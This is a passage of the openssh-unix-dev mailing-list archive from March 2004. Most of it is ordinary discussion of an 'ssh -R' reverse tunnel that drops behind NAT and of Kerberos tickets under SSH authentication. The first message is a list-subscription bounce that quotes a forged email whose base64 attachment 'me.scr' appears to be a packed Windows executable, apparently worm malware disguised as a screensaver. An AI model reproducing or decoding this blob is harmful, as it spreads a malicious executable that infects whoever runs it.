From: openssh-unix-dev-bounces+alex.bell=3Dbt.com at mindrot.org [mailto:openssh-unix-dev-bounces+alex.bell=3Dbt.com at mindrot.org] On = Behalf Of arise-help at pry.com Sent: 03 March 2004 23:34 To: openssh-unix-dev at mindrot.org Subject: confirm subscribe to arise at pry.com Hi! This is the ezmlm program. I'm managing the arise at pry.com mailing list. I'm working for my owner, who can be reached at arise-owner at pry.com. To confirm that you would like openssh-unix-dev at mindrot.org added to the arise mailing list, please send an empty reply to this address: =20 arise-sc.1078356863.bdobopfgcnngnbelejpn-openssh-unix-dev=3Dmindrot.org at p= r y.com Usually, this happens when you just hit the "reply" button. If this does not work, simply copy the address and paste it into the "To:" field of a new message. This confirmation serves two purposes. First, it verifies that I am able to get mail through to you. Second, it protects you in case someone forges a subscription request in your name. --- Administrative commands for the arise list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To subscribe to the list digest, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. 
--- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 14331 invoked by alias); 3 Mar 2004 23:34:23 -0000 Delivered-To: arise-subscribe at pry.com Received: (qmail 14327 invoked from network); 3 Mar 2004 23:34:18 -0000 Received: from unknown (HELO pry.com) (213.13.229.68) by 0 with SMTP; 3 Mar 2004 23:34:18 -0000 
From: openssh-unix-dev at mindrot.org To: arise-subscribe at pry.com Subject: warning Date: Wed, 3 Mar 2004 20:36:47 -0300 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=3D"34222687" --34222687 Content-Type: text/plain; charset=3Dus-ascii Content-Transfer-Encoding: 7bit misc --34222687 Content-Type: application/octet-stream; name=3D"me.scr" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename=3D"me.scr"
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 AfNQg8cI/5bwnQEAlYoHRwjAdNyJ+XkHD7cHR1BHuVdI8q5V/5b0nQEACcB0B4kDg8ME69j/ lvidAQBh6beo/v8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAgADAAAAIAAAgA4AAABgAACAAAAAAAAAAAAAAAAAAAABAAEAAAA4AACAAAAAAAAA AAAAAAAAAAABAAcEAABQAAAApKABAKgMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQBlAAAA eAAAgAAAAAAAAAAAAAAAAAAAAQAHBAAAkAAAAFCtAQAUAAAAAAAAAAAAAACgcAEAKAAAACAA AABAAAAAAQAYAAAAAACADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgMDAwMDAwMDAwMDAwMDAwMDAwMDA wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////////////////////// /////////////////////////////////////////////8DAwAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAICAgP////////////////////////////////////////////////////////// /////////////////////////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP// 
//////////////////////////////////////////////////////////////////////// /////////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////// /////////////////////////////////8DAwMDAwMDAwMDAwMDAwMDAwP///////////8DA wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////////////// /////////////////////////////////////////////////////8DAwAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAICAgP///////////8DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA wMDAwMDAwMDAwMDAwMDAwMDAwP///////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AICAgP////////////////////////////////////////////////////////////////// /////////////////////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////// /8DAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwP////// /////8DAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////// /////////////////////////////////////////////////////////////8DAwAAAAP8A AAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAMDAwMDAwMDA wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwP///////////8DAwAAAAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAP////////////////////////// /////////////////////////////8DAwAAAAP8AAAAAAP////////////////////////// //////////////////////8AAAAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA wP///////////8DAwAAAAAAAAP8AAP////8AAAAAAP8AAP////8AAAAAAP8AAAAAAP////// /////wAAAP8AAP///////////////////////////////////////////////////////8DA wAAAAP8AAAAAAP///wAAAP8AAAAAAP///wAAAP8AAAAAAP8AAMDAwP////////8AAAAAAMDA wMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwP///////////8DAwAAAAAAAAP8AAP// //8AAAAAAP8AAP////8AAAAAAP8AAAAAAICAgP///////wAAAP8AAP////////////////// /////////////////////////////////////8DAwAAAAP8AAAAAAP///wAAAP8AAAAAAP8A AAAAAP8AAAAAAP8AAAAAAP////////8AAAAAAMDAwMDAwP///////8DAwMDAwMDAwMDAwMDA wMDAwMDAwP///////////8DAwAAAAAAAAP8AAP////8AAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAMDAwP///wAAAP8AAP///////////////8DAwMDAwMDAwP///8DAwMDAwMDAwP////// /////8DAwAAAAP8AAAAAAP///wAAAP8AAP////8AAAAAAP8AAP////8AAAAAAICAgP////8A 
AAAAAMDAwMDAwP///////8DAwMDAwP///////////////8DAwP///////////8DAwAAAAAAA AP8AAAAAAP8AAAAAAP///wAAAP8AAAAAAP///wAAAP8AAAAAAP///wAAAP8AAP////////// /////8DAwMDAwMDAwP///////8DAwMDAwP///////////8DAwAAAAP8AAAAAAP8AAAAAAP8A AP////8AAAAAAP8AAP////8AAAAAAP8AAAAAAP8AAAAAAMDAwMDAwP///////8DAwP////// /////////////8DAwP///////////8DAwAAAAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAP///////////////8DAwMDAwP///////4CAgAAAAAAA AAAAAAAAAAAAAAAAAAAAAP8AAAAAAP////////////////////////////////////////// //////8AAAAAAP///////////////8DAwMDAwMDAwMDAwICAgP///////////8DAwICAgAAA AAAAAAAAAP8AAP///////////////////////////////////////////////wAAAP8AAP// /////////////8DAwMDAwMDAwMDAwICAgP///////8DAwICAgAAAAAAAAAAAAP8AAAAAAP8A AAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP////////////////// /////////////4CAgP///8DAwICAgAAAAAAAAAAAAAAAAAAAAP8AAAAAAP8AAAAAAP8AAAAA AP8AAAAAAP8AAAAAAP8AAAAAAP8AAAAAAP8AAP///////////////////////////////4CA gMDAwICAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////// /////////////////////////////////////////////////////4CAgICAgAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAgP////////////////////////// /////////////////////////////////////4CAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA gICAgICAgICAgICAgICAgICAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP/////+AAAA/gAAAP4AAAD+AAAA/gAAAP4A AAD+AAAA/gAAAP4AAAD+AAAA/gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAAADAAAABwAAAA/+AAAf/gAAP/4AAH//////SH0BAAAA AQABACAgAAABABgAqAwAAAEAAAAAAAAAAAAAAAAAKK4BAPCtAQAAAAAAAAAAAAAAAAA1rgEA AK4BAAAAAAAAAAAAAAAAAEKuAQAIrgEAAAAAAAAAAAAAAAAAT64BABCuAQAAAAAAAAAAAAAA AABargEAGK4BAAAAAAAAAAAAAAAAAGauAQAgrgEAAAAAAAAAAAAAAAAAAAAAAAAAAABwrgEA fq4BAI6uAQAAAAAAnK4BAAAAAACqrgEAAAAAALyuAQAAAAAAyK4BAAAAAAADAACAAAAAAEtF 
_______________________________________________
openssh-unix-dev mailing list
openssh-unix-dev at mindrot.org
http://www.mindrot.org/mailman/listinfo/openssh-unix-dev

From chlor at schou.dk Thu Mar 4 23:50:08 2004
From: chlor at schou.dk (Hans Schou)
Date: Thu, 4 Mar 2004 13:50:08 +0100 (CET)
Subject: -R port:host:hostport - communication lost after some minutes
Message-ID:

Hi

As this '-R' command initially works fine I guess it must be a bug.

I have to login at a computer which is hidden behind NAT. The user (joe) at the computer then connects to my server with the command:
  ssh -R 1234:localhost:22 test.com

Then I login to test.com and connect back to joe's computer:
  ssh -p 1234 localhost

I get a successful connection every time but after a few minutes, typing some simple commands, the communication just stops and I can type nothing. The only thing I can do is to ask joe to establish a new connection.

Am I doing something wrong?
How can I give a better bug report?

/hans
--
Hamletsgade 4 - 201, DK-2200 København N, Phone: +45 3582 9079
Schou Industries ApS http://schou.dk/ CVR: 26 13 44 39
--------------------------------------------------------------
Language purists want the semicolon to be used more; I am against it ;-)

From flavien at lebarbe.net Fri Mar 5 00:30:36 2004
From: flavien at lebarbe.net (Flavien)
Date: Thu, 4 Mar 2004 14:30:36 +0100
Subject: -R port:host:hostport - communication lost after some minutes
In-Reply-To:
References:
Message-ID: <20040304133036.GA6958@lebarbe.net>

Hello,

Hans Schou wrote:
> The user
> (joe) at the computer then connects to my server with the command:
>   ssh -R 1234:localhost:22 test.com
>
> Then I login to test.com and connect back to joe's computer:
>   ssh -p 1234 localhost
>
> I get a successful connection every time but after a few
> minutes, typing some simple commands, the communication just
> stops and I can type nothing. The only thing I can do is to ask
> joe to establish a new connection.

I'm interested in tips to debug that kind of problem too. I've already been in exactly the same configuration (ssh -R 1234:localhost:22 and then ssh -p 1234) to bypass NAT, and I've also had problems with it hanging up and me having to ask "joe" to connect again.

I must add that in my particular situation, joe connected to "test.com" through "a lot" (at least 3) of internal networks / firewalls / NAT... And that probably is the root of the problem.

Flavien.

From kumaresh_ind at gmx.net Fri Mar 5 00:33:34 2004
From: kumaresh_ind at gmx.net (Kumaresh)
Date: Thu, 4 Mar 2004 19:03:34 +0530
Subject: SSH + Kerberos Password auth
References: <084f01c401d5$4af2e270$230110ac@kurco>
Message-ID: <08f601c401ed$4f17e720$230110ac@kurco>

As a follow up of the previous question, I dug into the source; please validate my understanding.

When SSH is used with GSSAPI or Kerberos password authentication, once the user is authenticated and after logout, if we do klist, then there are no keys displayed.
I have come across the function krb5_free_principal( ). Is this the function that destroys the keys after the authentication is done?

Thanks for your answers.

Regards,
Kumar

----- Original Message -----
From: "Kumaresh"
To: "OpenSSH Devel List"
Sent: Thursday, March 04, 2004 4:11 PM
Subject: SSH + Kerberos Password auth

> Hello,
>
> I have a question about SSH with Kerberos password authentication.
>
> Do I receive any host ticket to my client machine when I do ssh connection
> with Kerberos password authentication? If don't, why?
>
> If I login to remote machine through telnet with Kerberos Password
> authentication [through PAM-kerberos], then I can see the tickets with
> klist. But with the same setup for sshd, I cannot see the tickets with
> klist.
>
> Thanks,
> Kumaresh
>
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004
>
> _______________________________________________
> openssh-unix-dev mailing list
> openssh-unix-dev at mindrot.org
> http://www.mindrot.org/mailman/listinfo/openssh-unix-dev
>

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004

From chlor at schou.dk Fri Mar 5 00:42:35 2004
From: chlor at schou.dk (Hans Schou)
Date: Thu, 4 Mar 2004 14:42:35 +0100 (CET)
Subject: -R port:host:hostport - communication lost after some minutes
In-Reply-To: <20040304133036.GA6958@lebarbe.net>
References: <20040304133036.GA6958@lebarbe.net>
Message-ID:

On Thu, 4 Mar 2004, Flavien wrote:

> I must add that in my particular situation, joe connected to
> "test.com" through "a lot" (at least 3) of internal networks /
> firewalls / NAT... And that probably is the root of the problem.

I had exactly the same problem with "jane", and she is sitting behind a different router on another location. Both joe and jane have only one router in my setup.

I guess I can reproduce the bug within 15 minutes.

/hans
--
Hamletsgade 4 - 201, DK-2200 København N, Phone: +45 3582 9079
Schou Industries ApS http://schou.dk/ CVR: 26 13 44 39
--------------------------------------------------------------
Language purists want the semicolon to be used more; I am against it ;-)

From sxw at inf.ed.ac.uk Fri Mar 5 02:09:10 2004
From: sxw at inf.ed.ac.uk (sxw at inf.ed.ac.uk)
Date: Thu, 4 Mar 2004 15:09:10 +0000 (GMT)
Subject: SSH + Kerberos Password auth
In-Reply-To: <08f601c401ed$4f17e720$230110ac@kurco>
Message-ID:

On Thu, 4 Mar 2004, Kumaresh wrote:

> As a follow up of the previous question, I dig the source and please
> validate my understanding.
>
> When SSH is used with GSSAPI or Kerberos password authentication, once the
> user is authenticated and after logout, if we do klist, then there are no
> keys displayed.
> I have come across the function krb5_free_principal( ). Is this the function
> that destroys the keys after the authentication is done?

Err, no - that's just an internal memory destructor.

You want the "GssapiDelegateCredentials" option, or the (IIRC) -k command line switch. Read the man pages for more details.

S.

From deengert at anl.gov Fri Mar 5 02:29:05 2004
From: deengert at anl.gov (Douglas E. Engert)
Date: Thu, 04 Mar 2004 09:29:05 -0600
Subject: SSH + Kerberos Password auth
References: <084f01c401d5$4af2e270$230110ac@kurco>
Message-ID: <40474B41.C579ACF0@anl.gov>

Kumaresh wrote:
>
> Hello,
>
> I have a question about SSH with Kerberos password authentication.

Maybe I am misunderstanding your question. Do you mean when you send your user and password over the network to a remote machine? The sshd on that machine then uses your user and password to get kerberos tickets and saves the tickets in the cache on that machine.

>
> Do I receive any host ticket to my client machine when I do ssh connection
> with Kerberos password authentication? If don't, why?

No, not on the client, as you are not using Kerberos on the client, only on the remote machine. In this case the client does not need any kerberos code.

>
> If I login to remote machine through telnet with Kerberos Password
> authentication [through PAM-kerberos], then I can see the tickets with
> klist. But with the same setup for sshd, I cannot see the tickets with
> klist.

Is your kerberos password the same as the local machine password? Whose kerberos are you using? What is in your sshd_config? Is a KRB5CCNAME environment variable set for you?

It works for me, but we don't normally have this turned on, as the intent of Kerberos is to get credentials on the local workstation once, then use the gssapi to authenticate and delegate to remote hosts. When used as intended the Kerberos password never leaves the local machine. And if you were to use some Kerberos pre-auth you may not even have a Kerberos password to send!

>
> Thanks,
> Kumaresh
>
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004
>
> _______________________________________________
> openssh-unix-dev mailing list
> openssh-unix-dev at mindrot.org
> http://www.mindrot.org/mailman/listinfo/openssh-unix-dev

--
Douglas E. Engert
Argonne National Laboratory
9700 South Cass Avenue
Argonne, Illinois 60439
(630) 252-5444

From deengert at anl.gov Fri Mar 5 02:31:27 2004
From: deengert at anl.gov (Douglas E. Engert)
Date: Thu, 04 Mar 2004 09:31:27 -0600
Subject: SSH + Kerberos Password auth
References: <084f01c401d5$4af2e270$230110ac@kurco> <08f601c401ed$4f17e720$230110ac@kurco>
Message-ID: <40474BCF.F014B2C5@anl.gov>

Kumaresh wrote:
>
> As a follow up of the previous question, I dig the source and please
> validate my understanding.
>
> When SSH is used with GSSAPI or Kerberos password authentication, once the
> user is authenticated and after logout, if we do klist, then there are no
> keys displayed.

